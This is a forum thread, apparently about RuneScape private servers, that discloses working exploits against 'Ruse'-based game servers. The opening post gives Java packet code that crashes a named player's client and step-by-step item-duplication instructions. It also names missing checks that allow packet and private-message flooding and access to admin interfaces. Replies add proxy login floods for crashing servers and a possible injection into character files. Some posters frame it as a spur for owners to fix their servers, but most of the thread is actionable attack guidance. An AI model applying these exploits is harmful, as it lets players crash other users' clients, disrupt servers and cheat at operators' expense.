(If your private message contains the character �, the other persons client will crash)
Code:
String message = "what level should i start killing lavas?�";
long aLong953 = TextClass.longForName("pure noob"); //Replace "pure noob" with the person you want to crash
player.getStream().createFrame(126);
player.getStream().writeWordBigEndian(0);
int k = player.getStream().currentOffset;
player.getStream().writeQWord(aLong953);
It has been a while since I have done this exploit, but I can see that this exists on all Ruse servers (due to the methods involved).
Requirements:
- You'll need to use either a modified client or Reflection to connect to the server with two accounts
1. The first account needs to be signed in with the items you want to dupe
2. The second account, you'll need to create with the EXACT same name as the account you wish to dupe, but the account MUST have a space at the end. (For Example "jet kai" & "jet kai ")
3. You'll need to trade over the items you wish to dupe on the second account (or drop them to the other account). Once you have the items transferred over, if you log out & login, the account will save with those items PERMANENTLY.
4. Logout & Login, trade the items to your other account and continue to Logout & Login, the items will be infinitely duped - This is abusing the Ruse Login & Saving code
for (int k1 = 0; k1 < 4; k1++)
for (int i2 = 1; i2 < 103; i2++)
for (int k2 = 1; k2 < 103; k2++)
aClass11Array1230[k1].anIntArrayArray294[i2][k2] = 0;
Extra Stuff:
You can also force open any interface and use the buttons on them, some servers may have Admin Interfaces that you can interact with (without any checks)
Ruse sources do not have any packet limits, you can flood as many packets as you want
Ruse checks the certain names client-sided, meaning you can have a name that no one else can sign into using the Ruse client) - Such as "Mod", "Admin", "Dev"
You can also flood Private Messages with no checks, meaning you can spam everyone on the server with various messages, such as Justin Bieber Baby lyrics
Bruteforcing, flooding & hacking is extremely fast & easy on Ruse bases - If you'd like to fix this, feel free to [Only registered and activated users can see links. Click Here To Register...] for some tips
Probably missed a few, but these were the packets I had in my custom MoparScape Bot Client (for Ruse servers). If you'd like to contribute, feel free to reply with any further packets and I can credit you.
04-20-2021, 02:25 PM
Rythe
nice post, thanks
04-20-2021, 03:19 PM
.css
Noice B^)
Let the games begin [Only registered and activated users can see links. Click Here To Register...]
04-20-2021, 04:52 PM
jet kai
I’ll upload some source code later (using Reflection), if anyone is interested in trying these exploits. Packets will be included in the source. You’ll just need to change the jar to the client you want to run it with. IJ is ideal.
04-20-2021, 05:50 PM
RuneLivesRSPS
Ruse was a good base for it's time. Perhaps this will encourage some to learn how to migrate to updated sources, so we can grow as a community.
04-20-2021, 06:01 PM
mikan
god bless kai fixing this on nr right now :pray: thank you
Quote:
Originally Posted by RuneLivesRSPS[Only registered and activated users can see links. Click Here To Register...]
Ruse was a good base for it's time. Perhaps this will encourage some to learn how to migrate to updated sources, so we can grow as a community.
true, maybe this will encourage some people to learn how to migrate themselves [Only registered and activated users can see links. Click Here To Register...]
04-20-2021, 06:23 PM
Omar
Good thread. It's kind of horrifying that some of these are even a thing.
04-20-2021, 06:27 PM
jet kai
Quote:
Originally Posted by Omar[Only registered and activated users can see links. Click Here To Register...]
Good thread. It's kind of horrifying that some of these are even a thing.
What’s more horrifying is that the only way any of the server owners know about it, is if you mention it to other players. They don’t even log any of it (except one server which logged the addItem void).
04-20-2021, 06:41 PM
mige5
Dunno if this is still a thing but u used to be able to basically rewrite ur character file due to the servers having change pass command and txt based char files.
04-20-2021, 06:43 PM
jet kai
Quote:
Originally Posted by mige5[Only registered and activated users can see links. Click Here To Register...]
Dunno if this is still a thing but u used to be able to basically rewrite ur character file due to the servers having change pass command and txt based char files.
I had tried to do that, but these sources are using JSON to store the character file information. If you can find a way to escape out the JSON parser library they are using, you’ll be able to write to the character file using the MAC address on the login packet. MAC is not checked and can be a very long string.
04-20-2021, 06:46 PM
mige5
Also u can still try to find stuff to abuse on osrs (will be very hard to find anything though).. but for example u used to be able to cast any spell from any spellbook due to jagex not verifying which spellbook u were on.
04-20-2021, 06:47 PM
JayArrowz
There is also the issue where noobs place the player saving on the netty handler threads causing all kinds of funky shit to happen and server to eventually crash.
All someone needs to do is proxy login with 1000 proxies which cost like 5$. Then logout and repeat 1000s of times per second. (Some servers require you to complete appearance)
04-20-2021, 06:55 PM
jet kai
Quote:
Originally Posted by mige5[Only registered and activated users can see links. Click Here To Register...]
Also u can still try to find stuff to abuse on osrs (will be very hard to find anything though).. but for example u used to be able to cast any spell from any spellbook due to jagex not verifying which spellbook u were on.
Using a deob, I was able to flood everyone’s PM’s at the Grand Exchange on OSRS, they did not have a PM Flooder Check. Everyone enjoys Justin Bieber, even on OSRS! Since it’s a small dev team there are bound to be some things that’ll be exploitable but OSRS doesn’t really interest me anymore.
Quote:
Originally Posted by JayArrowz[Only registered and activated users can see links. Click Here To Register...]
There is also the issue where noobs place the player saving on the netty handler threads causing all kinds of funky shit to happen and server to eventually crash.
All someone needs to do is proxy login with 1000 proxies which cost like 5$. Then logout and repeat 1000s of times per second. (Some servers require you to complete appearance)
That’s a pretty interesting one, I did experiment with something similar to that but could never cause a ruse server to have issues with login/logout - except creating them many many many account files.
04-20-2021, 07:02 PM
Women
nice job god kai
04-21-2021, 12:05 AM
Co Pure Gs
Quote:
Originally Posted by JayArrowz[Only registered and activated users can see links. Click Here To Register...]
There is also the issue where noobs place the player saving on the netty handler threads causing all kinds of funky shit to happen and server to eventually crash.
All someone needs to do is proxy login with 1000 proxies which cost like 5$. Then logout and repeat 1000s of times per second. (Some servers require you to complete appearance)
It's also really easy to get thousands of proxies for free, but that opens up the possibility of server owners being able to block them from login with relatively little effort.
04-21-2021, 03:21 AM
Leon.
Fake, ruse is good server no problem.
Nice post :D
